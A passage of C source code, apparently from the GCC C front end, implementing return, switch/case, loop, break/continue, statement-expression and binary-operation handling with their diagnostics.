/* If the second operand of the MINUS_EXPR has a pointer
type (or is converted from it), this may be valid, so
don't give a warning. */
{
tree op1 = TREE_OPERAND (inner, 1);
while (!POINTER_TYPE_P (TREE_TYPE (op1))
&& (CONVERT_EXPR_P (op1)
|| TREE_CODE (op1) == NON_LVALUE_EXPR))
op1 = TREE_OPERAND (op1, 0);
if (POINTER_TYPE_P (TREE_TYPE (op1)))
break;
inner = TREE_OPERAND (inner, 0);
continue;
}
case ADDR_EXPR:
inner = TREE_OPERAND (inner, 0);
while (REFERENCE_CLASS_P (inner)
&& !INDIRECT_REF_P (inner))
inner = TREE_OPERAND (inner, 0);
if (DECL_P (inner)
&& !DECL_EXTERNAL (inner)
&& !TREE_STATIC (inner)
&& DECL_CONTEXT (inner) == current_function_decl
&& POINTER_TYPE_P (TREE_TYPE (TREE_TYPE (current_function_decl))))
{
if (TREE_CODE (inner) == LABEL_DECL)
warning_at (loc, OPT_Wreturn_local_addr,
"function returns address of label");
else
{
warning_at (loc, OPT_Wreturn_local_addr,
"function returns address of local variable");
tree zero = build_zero_cst (TREE_TYPE (res));
t = build2 (COMPOUND_EXPR, TREE_TYPE (res), t, zero);
}
}
break;
default:
break;
}
break;
}
retval = build2 (MODIFY_EXPR, TREE_TYPE (res), res, t);
SET_EXPR_LOCATION (retval, loc);
if (warn_sequence_point)
verify_sequence_points (retval);
}
ret_stmt = build_stmt (loc, RETURN_EXPR, retval);
TREE_NO_WARNING (ret_stmt) |= no_warning;
return add_stmt (ret_stmt);
}
struct c_switch {
/* The SWITCH_EXPR being built. */
tree switch_expr;
/* The original type of the testing expression, i.e. before the
default conversion is applied. */
tree orig_type;
/* A splay-tree mapping the low element of a case range to the high
element, or NULL_TREE if there is no high element. Used to
determine whether or not a new case label duplicates an old case
label. We need a tree, rather than simply a hash table, because
of the GNU case range extension. */
splay_tree cases;
/* The bindings at the point of the switch. This is used for
warnings crossing decls when branching to a case label. */
struct c_spot_bindings *bindings;
/* The next node on the stack. */
struct c_switch *next;
/* Remember whether the controlling expression had boolean type
before integer promotions for the sake of -Wswitch-bool. */
bool bool_cond_p;
};
/* A stack of the currently active switch statements. The innermost
switch statement is on the top of the stack. There is no need to
mark the stack for garbage collection because it is only active
during the processing of the body of a function, and we never
collect at that point. */
struct c_switch *c_switch_stack;
/* Start a C switch statement, testing expression EXP. Return the new
SWITCH_EXPR. SWITCH_LOC is the location of the `switch'.
SWITCH_COND_LOC is the location of the switch's condition.
EXPLICIT_CAST_P is true if the expression EXP has an explicit cast. */
tree
c_start_case (location_t switch_loc,
location_t switch_cond_loc,
tree exp, bool explicit_cast_p)
{
tree orig_type = error_mark_node;
bool bool_cond_p = false;
struct c_switch *cs;
if (exp != error_mark_node)
{
orig_type = TREE_TYPE (exp);
if (!INTEGRAL_TYPE_P (orig_type))
{
if (orig_type != error_mark_node)
{
error_at (switch_cond_loc, "switch quantity not an integer");
orig_type = error_mark_node;
}
exp = integer_zero_node;
}
else
{
tree type = TYPE_MAIN_VARIANT (orig_type);
tree e = exp;
/* Warn if the condition has boolean value. */
while (TREE_CODE (e) == COMPOUND_EXPR)
e = TREE_OPERAND (e, 1);
if ((TREE_CODE (type) == BOOLEAN_TYPE
|| truth_value_p (TREE_CODE (e)))
/* Explicit cast to int suppresses this warning. */
&& !(TREE_CODE (type) == INTEGER_TYPE
&& explicit_cast_p))
bool_cond_p = true;
if (!in_system_header_at (input_location)
&& (type == long_integer_type_node
|| type == long_unsigned_type_node))
warning_at (switch_cond_loc,
OPT_Wtraditional, "%<long%> switch expression not "
"converted to %<int%> in ISO C");
exp = c_fully_fold (exp, false, NULL);
exp = default_conversion (exp);
if (warn_sequence_point)
verify_sequence_points (exp);
}
}
/* Add this new SWITCH_EXPR to the stack. */
cs = XNEW (struct c_switch);
cs->switch_expr = build2 (SWITCH_EXPR, orig_type, exp, NULL_TREE);
SET_EXPR_LOCATION (cs->switch_expr, switch_loc);
cs->orig_type = orig_type;
cs->cases = splay_tree_new (case_compare, NULL, NULL);
cs->bindings = c_get_switch_bindings ();
cs->bool_cond_p = bool_cond_p;
cs->next = c_switch_stack;
c_switch_stack = cs;
return add_stmt (cs->switch_expr);
}
/* Process a case label at location LOC. */
tree
do_case (location_t loc, tree low_value, tree high_value)
{
tree label = NULL_TREE;
if (low_value && TREE_CODE (low_value) != INTEGER_CST)
{
low_value = c_fully_fold (low_value, false, NULL);
if (TREE_CODE (low_value) == INTEGER_CST)
pedwarn (loc, OPT_Wpedantic,
"case label is not an integer constant expression");
}
if (high_value && TREE_CODE (high_value) != INTEGER_CST)
{
high_value = c_fully_fold (high_value, false, NULL);
if (TREE_CODE (high_value) == INTEGER_CST)
pedwarn (input_location, OPT_Wpedantic,
"case label is not an integer constant expression");
}
if (c_switch_stack == NULL)
{
if (low_value)
error_at (loc, "case label not within a switch statement");
else
error_at (loc, "%<default%> label not within a switch statement");
return NULL_TREE;
}
if (c_check_switch_jump_warnings (c_switch_stack->bindings,
EXPR_LOCATION (c_switch_stack->switch_expr),
loc))
return NULL_TREE;
label = c_add_case_label (loc, c_switch_stack->cases,
SWITCH_COND (c_switch_stack->switch_expr),
low_value, high_value);
if (label == error_mark_node)
label = NULL_TREE;
return label;
}
/* Finish the switch statement. TYPE is the original type of the
controlling expression of the switch, or NULL_TREE. */
void
c_finish_case (tree body, tree type)
{
struct c_switch *cs = c_switch_stack;
location_t switch_location;
SWITCH_BODY (cs->switch_expr) = body;
/* Emit warnings as needed. */
switch_location = EXPR_LOCATION (cs->switch_expr);
c_do_switch_warnings (cs->cases, switch_location,
type ? type : TREE_TYPE (cs->switch_expr),
SWITCH_COND (cs->switch_expr), cs->bool_cond_p);
if (c_switch_covers_all_cases_p (cs->cases, TREE_TYPE (cs->switch_expr)))
SWITCH_ALL_CASES_P (cs->switch_expr) = 1;
/* Pop the stack. */
c_switch_stack = cs->next;
splay_tree_delete (cs->cases);
c_release_switch_bindings (cs->bindings);
XDELETE (cs);
}
/* Emit an if statement. IF_LOCUS is the location of the 'if'. COND,
THEN_BLOCK and ELSE_BLOCK are expressions to be used; ELSE_BLOCK
may be null. */
void
c_finish_if_stmt (location_t if_locus, tree cond, tree then_block,
tree else_block)
{
tree stmt;
stmt = build3 (COND_EXPR, void_type_node, cond, then_block, else_block);
SET_EXPR_LOCATION (stmt, if_locus);
add_stmt (stmt);
}
/* Emit a general-purpose loop construct. START_LOCUS is the location of
the beginning of the loop. COND is the loop condition. COND_IS_FIRST
is false for DO loops. INCR is the FOR increment expression. BODY is
the statement controlled by the loop. BLAB is the break label. CLAB is
the continue label. Everything is allowed to be NULL.
COND_LOCUS is the location of the loop condition, INCR_LOCUS is the
location of the FOR increment expression. */
void
c_finish_loop (location_t start_locus, location_t cond_locus, tree cond,
location_t incr_locus, tree incr, tree body, tree blab,
tree clab, bool cond_is_first)
{
tree entry = NULL, exit = NULL, t;
/* If the condition is zero don't generate a loop construct. */
if (cond && integer_zerop (cond))
{
if (cond_is_first)
{
t = build_and_jump (&blab);
SET_EXPR_LOCATION (t, start_locus);
add_stmt (t);
}
}
else
{
tree top = build1 (LABEL_EXPR, void_type_node, NULL_TREE);
/* If we have an exit condition, then we build an IF with gotos either
out of the loop, or to the top of it. If there's no exit condition,
then we just build a jump back to the top. */
exit = build_and_jump (&LABEL_EXPR_LABEL (top));
if (cond && !integer_nonzerop (cond))
{
/* Canonicalize the loop condition to the end. This means
generating a branch to the loop condition. Reuse the
continue label, if possible. */
if (cond_is_first)
{
if (incr || !clab)
{
entry = build1 (LABEL_EXPR, void_type_node, NULL_TREE);
t = build_and_jump (&LABEL_EXPR_LABEL (entry));
}
else
t = build1 (GOTO_EXPR, void_type_node, clab);
SET_EXPR_LOCATION (t, start_locus);
add_stmt (t);
}
t = build_and_jump (&blab);
exit = fold_build3_loc (cond_is_first ? start_locus : input_location,
COND_EXPR, void_type_node, cond, exit, t);
}
else
{
/* For the backward-goto's location of an unconditional loop
use the beginning of the body, or, if there is none, the
top of the loop. */
location_t loc = EXPR_LOCATION (expr_first (body));
if (loc == UNKNOWN_LOCATION)
loc = start_locus;
SET_EXPR_LOCATION (exit, loc);
}
add_stmt (top);
}
if (body)
add_stmt (body);
if (clab)
add_stmt (build1 (LABEL_EXPR, void_type_node, clab));
if (incr)
{
if (MAY_HAVE_DEBUG_MARKER_STMTS && incr_locus != UNKNOWN_LOCATION)
{
t = build0 (DEBUG_BEGIN_STMT, void_type_node);
SET_EXPR_LOCATION (t, incr_locus);
add_stmt (t);
}
add_stmt (incr);
}
if (entry)
add_stmt (entry);
if (MAY_HAVE_DEBUG_MARKER_STMTS && cond_locus != UNKNOWN_LOCATION)
{
t = build0 (DEBUG_BEGIN_STMT, void_type_node);
SET_EXPR_LOCATION (t, cond_locus);
add_stmt (t);
}
if (exit)
add_stmt (exit);
if (blab)
add_stmt (build1 (LABEL_EXPR, void_type_node, blab));
}
tree
c_finish_bc_stmt (location_t loc, tree *label_p, bool is_break)
{
bool skip;
tree label = *label_p;
/* In switch statements break is sometimes stylistically used after
a return statement. This can lead to spurious warnings about
control reaching the end of a non-void function when it is
inlined. Note that we are calling block_may_fallthru with
language specific tree nodes; this works because
block_may_fallthru returns true when given something it does not
understand. */
skip = !block_may_fallthru (cur_stmt_list);
if (!label)
{
if (!skip)
*label_p = label = create_artificial_label (loc);
}
else if (TREE_CODE (label) == LABEL_DECL)
;
else switch (TREE_INT_CST_LOW (label))
{
case 0:
if (is_break)
error_at (loc, "break statement not within loop or switch");
else
error_at (loc, "continue statement not within a loop");
return NULL_TREE;
case 1:
gcc_assert (is_break);
error_at (loc, "break statement used with OpenMP for loop");
return NULL_TREE;
case 2:
if (is_break)
error ("break statement within %<#pragma simd%> loop body");
else
error ("continue statement within %<#pragma simd%> loop body");
return NULL_TREE;
default:
gcc_unreachable ();
}
if (skip)
return NULL_TREE;
if (!is_break)
add_stmt (build_predict_expr (PRED_CONTINUE, NOT_TAKEN));
return add_stmt (build1 (GOTO_EXPR, void_type_node, label));
}
/* A helper routine for c_process_expr_stmt and c_finish_stmt_expr. */
static void
emit_side_effect_warnings (location_t loc, tree expr)
{
if (expr == error_mark_node)
;
else if (!TREE_SIDE_EFFECTS (expr))
{
if (!VOID_TYPE_P (TREE_TYPE (expr)) && !TREE_NO_WARNING (expr))
warning_at (loc, OPT_Wunused_value, "statement with no effect");
}
else if (TREE_CODE (expr) == COMPOUND_EXPR)
{
tree r = expr;
location_t cloc = loc;
while (TREE_CODE (r) == COMPOUND_EXPR)
{
if (EXPR_HAS_LOCATION (r))
cloc = EXPR_LOCATION (r);
r = TREE_OPERAND (r, 1);
}
if (!TREE_SIDE_EFFECTS (r)
&& !VOID_TYPE_P (TREE_TYPE (r))
&& !CONVERT_EXPR_P (r)
&& !TREE_NO_WARNING (r)
&& !TREE_NO_WARNING (expr))
warning_at (cloc, OPT_Wunused_value,
"right-hand operand of comma expression has no effect");
}
else
warn_if_unused_value (expr, loc);
}
/* Process an expression as if it were a complete statement. Emit
diagnostics, but do not call ADD_STMT. LOC is the location of the
statement. */
tree
c_process_expr_stmt (location_t loc, tree expr)
{
tree exprv;
if (!expr)
return NULL_TREE;
expr = c_fully_fold (expr, false, NULL);
if (warn_sequence_point)
verify_sequence_points (expr);
if (TREE_TYPE (expr) != error_mark_node
&& !COMPLETE_OR_VOID_TYPE_P (TREE_TYPE (expr))
&& TREE_CODE (TREE_TYPE (expr)) != ARRAY_TYPE)
error_at (loc, "expression statement has incomplete type");
/* If we're not processing a statement expression, warn about unused values.
Warnings for statement expressions will be emitted later, once we figure
out which is the result. */
if (!STATEMENT_LIST_STMT_EXPR (cur_stmt_list)
&& warn_unused_value)
emit_side_effect_warnings (EXPR_LOC_OR_LOC (expr, loc), expr);
exprv = expr;
while (TREE_CODE (exprv) == COMPOUND_EXPR)
exprv = TREE_OPERAND (exprv, 1);
while (CONVERT_EXPR_P (exprv))
exprv = TREE_OPERAND (exprv, 0);
if (DECL_P (exprv)
|| handled_component_p (exprv)
|| TREE_CODE (exprv) == ADDR_EXPR)
mark_exp_read (exprv);
/* If the expression is not of a type to which we cannot assign a line
number, wrap the thing in a no-op NOP_EXPR. */
if (DECL_P (expr) || CONSTANT_CLASS_P (expr))
{
expr = build1 (NOP_EXPR, TREE_TYPE (expr), expr);
SET_EXPR_LOCATION (expr, loc);
}
return expr;
}
/* Emit an expression as a statement. LOC is the location of the
expression. */
tree
c_finish_expr_stmt (location_t loc, tree expr)
{
if (expr)
return add_stmt (c_process_expr_stmt (loc, expr));
else
return NULL;
}
/* Do the opposite and emit a statement as an expression. To begin,
create a new binding level and return it. */
tree
c_begin_stmt_expr (void)
{
tree ret;
/* We must force a BLOCK for this level so that, if it is not expanded
later, there is a way to turn off the entire subtree of blocks that
are contained in it. */
keep_next_level ();
ret = c_begin_compound_stmt (true);
c_bindings_start_stmt_expr (c_switch_stack == NULL
? NULL
: c_switch_stack->bindings);
/* Mark the current statement list as belonging to a statement list. */
STATEMENT_LIST_STMT_EXPR (ret) = 1;
return ret;
}
/* LOC is the location of the compound statement to which this body
belongs. */
tree
c_finish_stmt_expr (location_t loc, tree body)
{
tree last, type, tmp, val;
tree *last_p;
body = c_end_compound_stmt (loc, body, true);
c_bindings_end_stmt_expr (c_switch_stack == NULL
? NULL
: c_switch_stack->bindings);
/* Locate the last statement in BODY. See c_end_compound_stmt
about always returning a BIND_EXPR. */
last_p = &BIND_EXPR_BODY (body);
last = BIND_EXPR_BODY (body);
continue_searching:
if (TREE_CODE (last) == STATEMENT_LIST)
{
tree_stmt_iterator l = tsi_last (last);
while (!tsi_end_p (l) && TREE_CODE (tsi_stmt (l)) == DEBUG_BEGIN_STMT)
tsi_prev (&l);
/* This can happen with degenerate cases like ({ }). No value. */
if (tsi_end_p (l))
return body;
/* If we're supposed to generate side effects warnings, process
all of the statements except the last. */
if (warn_unused_value)
{
for (tree_stmt_iterator i = tsi_start (last);
tsi_stmt (i) != tsi_stmt (l); tsi_next (&i))
{
location_t tloc;
tree t = tsi_stmt (i);
tloc = EXPR_HAS_LOCATION (t) ? EXPR_LOCATION (t) : loc;
emit_side_effect_warnings (tloc, t);
}
}
last_p = tsi_stmt_ptr (l);
last = *last_p;
}
/* If the end of the list is exception related, then the list was split
by a call to push_cleanup. Continue searching. */
if (TREE_CODE (last) == TRY_FINALLY_EXPR
|| TREE_CODE (last) == TRY_CATCH_EXPR)
{
last_p = &TREE_OPERAND (last, 0);
last = *last_p;
goto continue_searching;
}
if (last == error_mark_node)
return last;
/* In the case that the BIND_EXPR is not necessary, return the
expression out from inside it. */
if ((last == BIND_EXPR_BODY (body)
/* Skip nested debug stmts. */
|| last == expr_first (BIND_EXPR_BODY (body)))
&& BIND_EXPR_VARS (body) == NULL)
{
/* Even if this looks constant, do not allow it in a constant
expression. */
last = c_wrap_maybe_const (last, true);
/* Do not warn if the return value of a statement expression is
unused. */
TREE_NO_WARNING (last) = 1;
return last;
}
/* Extract the type of said expression. */
type = TREE_TYPE (last);
/* If we're not returning a value at all, then the BIND_EXPR that
we already have is a fine expression to return. */
if (!type || VOID_TYPE_P (type))
return body;
/* Now that we've located the expression containing the value, it seems
silly to make voidify_wrapper_expr repeat the process. Create a
temporary of the appropriate type and stick it in a TARGET_EXPR. */
tmp = create_tmp_var_raw (type);
/* Unwrap a no-op NOP_EXPR as added by c_finish_expr_stmt. This avoids
tree_expr_nonnegative_p giving up immediately. */
val = last;
if (TREE_CODE (val) == NOP_EXPR
&& TREE_TYPE (val) == TREE_TYPE (TREE_OPERAND (val, 0)))
val = TREE_OPERAND (val, 0);
*last_p = build2 (MODIFY_EXPR, void_type_node, tmp, val);
SET_EXPR_LOCATION (*last_p, EXPR_LOCATION (last));
{
tree t = build4 (TARGET_EXPR, type, tmp, body, NULL_TREE, NULL_TREE);
SET_EXPR_LOCATION (t, loc);
return t;
}
}
/* Begin and end compound statements. This is as simple as pushing
and popping new statement lists from the tree. */
tree
c_begin_compound_stmt (bool do_scope)
{
tree stmt = push_stmt_list ();
if (do_scope)
push_scope ();
return stmt;
}
/* End a compound statement. STMT is the statement. LOC is the
location of the compound statement-- this is usually the location
of the opening brace. */
tree
c_end_compound_stmt (location_t loc, tree stmt, bool do_scope)
{
tree block = NULL;
if (do_scope)
{
if (c_dialect_objc ())
objc_clear_super_receiver ();
block = pop_scope ();
}
stmt = pop_stmt_list (stmt);
stmt = c_build_bind_expr (loc, block, stmt);
/* If this compound statement is nested immediately inside a statement
expression, then force a BIND_EXPR to be created. Otherwise we'll
do the wrong thing for ({ { 1; } }) or ({ 1; { } }). In particular,
STATEMENT_LISTs merge, and thus we can lose track of what statement
was really last. */
if (building_stmt_list_p ()
&& STATEMENT_LIST_STMT_EXPR (cur_stmt_list)
&& TREE_CODE (stmt) != BIND_EXPR)
{
stmt = build3 (BIND_EXPR, void_type_node, NULL, stmt, NULL);
TREE_SIDE_EFFECTS (stmt) = 1;
SET_EXPR_LOCATION (stmt, loc);
}
return stmt;
}
/* Queue a cleanup. CLEANUP is an expression/statement to be executed
when the current scope is exited. EH_ONLY is true when this is not
meant to apply to normal control flow transfer. */
void
push_cleanup (tree decl, tree cleanup, bool eh_only)
{
enum tree_code code;
tree stmt, list;
bool stmt_expr;
code = eh_only ? TRY_CATCH_EXPR : TRY_FINALLY_EXPR;
stmt = build_stmt (DECL_SOURCE_LOCATION (decl), code, NULL, cleanup);
add_stmt (stmt);
stmt_expr = STATEMENT_LIST_STMT_EXPR (cur_stmt_list);
list = push_stmt_list ();
TREE_OPERAND (stmt, 0) = list;
STATEMENT_LIST_STMT_EXPR (list) = stmt_expr;
}
/* Build a vector comparison of ARG0 and ARG1 using CODE opcode
into a value of TYPE type. Comparison is done via VEC_COND_EXPR. */
static tree
build_vec_cmp (tree_code code, tree type,
tree arg0, tree arg1)
{
tree zero_vec = build_zero_cst (type);
tree minus_one_vec = build_minus_one_cst (type);
tree cmp_type = truth_type_for (type);
tree cmp = build2 (code, cmp_type, arg0, arg1);
return build3 (VEC_COND_EXPR, type, cmp, minus_one_vec, zero_vec);
}
/* Build a binary-operation expression without default conversions.
CODE is the kind of expression to build.
LOCATION is the operator's location.
This function differs from `build' in several ways:
the data type of the result is computed and recorded in it,
warnings are generated if arg data types are invalid,
special handling for addition and subtraction of pointers is known,
and some optimization is done (operations on narrow ints
are done in the narrower type when that gives the same result).
Constant folding is also done before the result is returned.
Note that the operands will never have enumeral types, or function
or array types, because either they will have the default conversions
performed or they have both just been converted to some other type in which
the arithmetic is to be done. */
tree
build_binary_op (location_t location, enum tree_code code,
tree orig_op0, tree orig_op1, bool convert_p)
{
tree type0, type1, orig_type0, orig_type1;
tree eptype;
enum tree_code code0, code1;
tree op0, op1;
tree ret = error_mark_node;
const char *invalid_op_diag;
bool op0_int_operands, op1_int_operands;
bool int_const, int_const_or_overflow, int_operands;
/* Expression code to give to the expression when it is built.
Normally this is CODE, which is what the caller asked for,
but in some special cases we change it. */
enum tree_code resultcode = code;
/* Data type in which the computation is to be performed.
In the simplest cases this is the common type of the arguments. */
tree result_type = NULL;
/* When the computation is in excess precision, the type of the
final EXCESS_PRECISION_EXPR. */
tree semantic_result_type = NULL;
/* Nonzero means operands have already been type-converted
in whatever way is necessary.
Zero means they need to be converted to RESULT_TYPE. */
int converted = 0;
/* Nonzero means create the expression with this type, rather than
RESULT_TYPE. */
tree build_type = NULL_TREE;
/* Nonzero means after finally constructing the expression
convert it to this type. */
tree final_type = NULL_TREE;
/* Nonzero if this is an operation like MIN or MAX which can
safely be computed in short if both args are promoted shorts.
Also implies COMMON.
-1 indicates a bitwise operation; this makes a difference
in the exact conditions for when it is safe to do the operation
in a narrower mode. */
int shorten = 0;
/* Nonzero if this is a comparison operation;
if both args are promoted shorts, compare the original shorts.
Also implies COMMON. */
int short_compare = 0;
/* Nonzero if this is a right-shift operation, which can be computed on the
original short and then promoted if the operand is a promoted short. */
int short_shift = 0;
/* Nonzero means set RESULT_TYPE to the common type of the args. */
int common = 0;
/* True means types are compatible as far as ObjC is concerned. */
bool objc_ok;
/* True means this is an arithmetic operation that may need excess
precision. */
bool may_need_excess_precision;
/* True means this is a boolean operation that converts both its
operands to truth-values. */
bool boolean_op = false;
/* Remember whether we're doing / or %. */
bool doing_div_or_mod = false;
/* Remember whether we're doing << or >>. */
bool doing_shift = false;
/* Tree holding instrumentation expression. */
tree instrument_expr = NULL;
if (location == UNKNOWN_LOCATION)
location = input_location;
op0 = orig_op0;
op1 = orig_op1;
op0_int_operands = EXPR_INT_CONST_OPERANDS (orig_op0);
if (op0_int_operands)
op0 = remove_c_maybe_const_expr (op0);
op1_int_operands = EXPR_INT_CONST_OPERANDS (orig_op1);
if (op1_int_operands)
op1 = remove_c_maybe_const_expr (op1);
int_operands = (op0_int_operands && op1_int_operands);
if (int_operands)
{
int_const_or_overflow = (TREE_CODE (orig_op0) == INTEGER_CST
&& TREE_CODE (orig_op1) == INTEGER_CST);
int_const = (int_const_or_overflow
&& !TREE_OVERFLOW (orig_op0)
&& !TREE_OVERFLOW (orig_op1));
}
else
int_const = int_const_or_overflow = false;
/* Do not apply default conversion in mixed vector/scalar expression. */
if (convert_p
&& VECTOR_TYPE_P (TREE_TYPE (op0)) == VECTOR_TYPE_P (TREE_TYPE (op1)))
{
op0 = default_conversion (op0);
op1 = default_conversion (op1);
}
orig_type0 = type0 = TREE_TYPE (op0);
orig_type1 = type1 = TREE_TYPE (op1);
/* The expression codes of the data types of the arguments tell us
whether the arguments are integers, floating, pointers, etc. */
code0 = TREE_CODE (type0);
code1 = TREE_CODE (type1);
/* Strip NON_LVALUE_EXPRs, etc., since we aren't using as an lvalue. */
STRIP_TYPE_NOPS (op0);
STRIP_TYPE_NOPS (op1);
/* If an error was already reported for one of the arguments,
avoid reporting another error. */
if (code0 == ERROR_MARK || code1 == ERROR_MARK)
return error_mark_node;
if (code0 == POINTER_TYPE
&& reject_gcc_builtin (op0, EXPR_LOCATION (orig_op0)))
return error_mark_node;
if (code1 == POINTER_TYPE
&& reject_gcc_builtin (op1, EXPR_LOCATION (orig_op1)))
return error_mark_node;
if ((invalid_op_diag
= targetm.invalid_binary_op (code, type0, type1)))
{
error_at (location, invalid_op_diag);
return error_mark_node;
}
switch (code)
{
case PLUS_EXPR:
case MINUS_EXPR:
case MULT_EXPR:
case TRUNC_DIV_EXPR:
case CEIL_DIV_EXPR:
case FLOOR_DIV_EXPR:
case ROUND_DIV_EXPR:
case EXACT_DIV_EXPR:
may_need_excess_precision = true;
break;
case EQ_EXPR:
case NE_EXPR:
case LE_EXPR:
case GE_EXPR:
case LT_EXPR:
case GT_EXPR:
/* Excess precision for implicit conversions of integers to
floating point in C11 and later. */
may_need_excess_precision = (flag_isoc11
&& (ANY_INTEGRAL_TYPE_P (type0)
|| ANY_INTEGRAL_TYPE_P (type1)));
break;
default:
may_need_excess_precision = false;
break;
}
if (TREE_CODE (op0) == EXCESS_PRECISION_EXPR)
{
op0 = TREE_OPERAND (op0, 0);
type0 = TREE_TYPE (op0);
}
else if (may_need_excess_precision
&& (eptype = excess_precision_type (type0)) != NULL_TREE)
{
type0 = eptype;
op0 = convert (eptype, op0);
}
if (TREE_CODE (op1) == EXCESS_PRECISION_EXPR)
{
op1 = TREE_OPERAND (op1, 0);
type1 = TREE_TYPE (op1);
}
else if (may_need_excess_precision
&& (eptype = excess_precision_type (type1)) != NULL_TREE)
{
type1 = eptype;
op1 = convert (eptype, op1);
}
objc_ok = objc_compare_types (type0, type1, -3, NULL_TREE);
/* In case when one of the operands of the binary operation is
a vector and another is a scalar -- convert scalar to vector. */
if ((gnu_vector_type_p (type0) && code1 != VECTOR_TYPE)
|| (gnu_vector_type_p (type1) && code0 != VECTOR_TYPE))
{
enum stv_conv convert_flag = scalar_to_vector (location, code, op0, op1,
true);
switch (convert_flag)
{
case stv_error:
return error_mark_node;
case stv_firstarg:
{
bool maybe_const = true;
tree sc;
sc = c_fully_fold (op0, false, &maybe_const);
sc = save_expr (sc);
sc = convert (TREE_TYPE (type1), sc);
op0 = build_vector_from_val (type1, sc);
if (!maybe_const)
op0 = c_wrap_maybe_const (op0, true);
orig_type0 = type0 = TREE_TYPE (op0);
code0 = TREE_CODE (type0);
converted = 1;
break;
}
case stv_secondarg:
{
bool maybe_const = true;
tree sc;
sc = c_fully_fold (op1, false, &maybe_const);
sc = save_expr (sc);
sc = convert (TREE_TYPE (type0), sc);
op1 = build_vector_from_val (type0, sc);
if (!maybe_const)
op1 = c_wrap_maybe_const (op1, true);
orig_type1 = type1 = TREE_TYPE (op1);
code1 = TREE_CODE (type1);
converted = 1;
break;
}
default:
break;
}
}
switch (code)
{
case PLUS_EXPR:
/* Handle the pointer + int case. */
if (code0 == POINTER_TYPE && code1 == INTEGER_TYPE)
{
ret = pointer_int_sum (location, PLUS_EXPR, op0, op1);
goto return_build_binary_op;
}
else if (code1 == POINTER_TYPE && code0 == INTEGER_TYPE)
{
ret = pointer_int_sum (location, PLUS_EXPR, op1, op0);
goto return_build_binary_op;
}
else
common = 1;
break;
case MINUS_EXPR:
/* Subtraction of two similar pointers.
We must subtract them as integers, then divide by object size. */
if (code0 == POINTER_TYPE && code1 == POINTER_TYPE
&& comp_target_types (location, type0, type1))
{
ret = pointer_diff (location, op0, op1, &instrument_expr);
goto return_build_binary_op;
}
/* Handle pointer minus int. Just like pointer plus int. */
else if (code0 == POINTER_TYPE && code1 == INTEGER_TYPE)
{
ret = pointer_int_sum (location, MINUS_EXPR, op0, op1);
goto return_build_binary_op;
}
else
common = 1;
break;
case MULT_EXPR:
common = 1;
break;
case TRUNC_DIV_EXPR:
case CEIL_DIV_EXPR:
case FLOOR_DIV_EXPR:
case ROUND_DIV_EXPR:
case EXACT_DIV_EXPR:
doing_div_or_mod = true;
warn_for_div_by_zero (location, op1);
if ((code0 == INTEGER_TYPE || code0 == REAL_TYPE
|| code0 == FIXED_POINT_TYPE
|| code0 == COMPLEX_TYPE
|| gnu_vector_type_p (type0))
&& (code1 == INTEGER_TYPE || code1 == REAL_TYPE
|| code1 == FIXED_POINT_TYPE
|| code1 == COMPLEX_TYPE
|| gnu_vector_type_p (type1)))
{
enum tree_code tcode0 = code0, tcode1 = code1;
if (code0 == COMPLEX_TYPE || code0 == VECTOR_TYPE)
tcode0 = TREE_CODE (TREE_TYPE (TREE_TYPE (op0)));
if (code1 == COMPLEX_TYPE || code1 == VECTOR_TYPE)
tcode1 = TREE_CODE (TREE_TYPE (TREE_TYPE (op1)));
if (!((tcode0 == INTEGER_TYPE && tcode1 == INTEGER_TYPE)
|| (tcode0 == FIXED_POINT_TYPE && tcode1 == FIXED_POINT_TYPE)))
resultcode = RDIV_EXPR;
else
/* Although it would be tempting to shorten always here, that
loses on some targets, since the modulo instruction is
undefined if the quotient can't be represented in the
computation mode. We shorten only if unsigned or if
dividing by something we know != -1. */
shorten = (TYPE_UNSIGNED (TREE_TYPE (orig_op0))
|| (TREE_CODE (op1) == INTEGER_CST
&& !integer_all_onesp (op1)));
common = 1;
}
break;
case BIT_AND_EXPR:
case BIT_IOR_EXPR:
case BIT_XOR_EXPR:
if (code0 == INTEGER_TYPE && code1 == INTEGER_TYPE)
shorten = -1;
/* Allow vector types which are not floating point types. */
else if (gnu_vector_type_p (type0)
&& gnu_vector_type_p (type1)
&& !VECTOR_FLOAT_TYPE_P (type0)
&& !VECTOR_FLOAT_TYPE_P (type1))
common = 1;
break;
case TRUNC_MOD_EXPR:
case FLOOR_MOD_EXPR:
doing_div_or_mod = true;
warn_for_div_by_zero (location, op1);
if (gnu_vector_type_p (type0)
&& gnu_vector_type_p (type1)
&& TREE_CODE (TREE_TYPE (type0)) == INTEGER_TYPE
&& TREE_CODE (TREE_TYPE (type1)) == INTEGER_TYPE)
common = 1;
else if (code0 == INTEGER_TYPE && code1 == INTEGER_TYPE)
{
/* Although it would be tempting to shorten always here, that loses
on some targets, since the modulo instruction is undefined if the
quotient can't be represented in the computation mode. We shorten
only if unsigned or if dividing by something we know != -1. */
shorten = (TYPE_UNSIGNED (TREE_TYPE (orig_op0))
|| (TREE_CODE (op1) == INTEGER_CST
&& !integer_all_onesp (op1)));
common = 1;
}
break;
case TRUTH_ANDIF_EXPR:
case TRUTH_ORIF_EXPR:
case TRUTH_AND_EXPR:
case TRUTH_OR_EXPR:
case TRUTH_XOR_EXPR:
if ((code0 == INTEGER_TYPE || code0 == POINTER_TYPE
|| code0 == REAL_TYPE || code0 == COMPLEX_TYPE
|| code0 == FIXED_POINT_TYPE)
&& (code1 == INTEGER_TYPE || code1 == POINTER_TYPE
|| code1 == REAL_TYPE || code1 == COMPLEX_TYPE
|| code1 == FIXED_POINT_TYPE))
{
/* Result of these operations is always an int,
but that does not mean the operands should be
converted to ints! */
result_type = integer_type_node;
if (op0_int_operands)
{
op0 = c_objc_common_truthvalue_conversion (location, orig_op0);
op0 = remove_c_maybe_const_expr (op0);
}
else
op0 = c_objc_common_truthvalue_conversion (location, op0);
if (op1_int_operands)
{
op1 = c_objc_common_truthvalue_conversion (location, orig_op1);
op1 = remove_c_maybe_const_expr (op1);
}
else
op1 = c_objc_common_truthvalue_conversion (location, op1);
converted = 1;
boolean_op = true;
}
if (code == TRUTH_ANDIF_EXPR)
{
int_const_or_overflow = (int_operands
&& TREE_CODE (orig_op0) == INTEGER_CST
&& (op0 == truthvalue_false_node
|| TREE_CODE (orig_op1) == INTEGER_CST));
int_const = (int_const_or_overflow
&& !TREE_OVERFLOW (orig_op0)
&& (op0 == truthvalue_false_node
|| !TREE_OVERFLOW (orig_op1)));
}
else if (code == TRUTH_ORIF_EXPR)
{
int_const_or_overflow = (int_operands
&& TREE_CODE (orig_op0) == INTEGER_CST
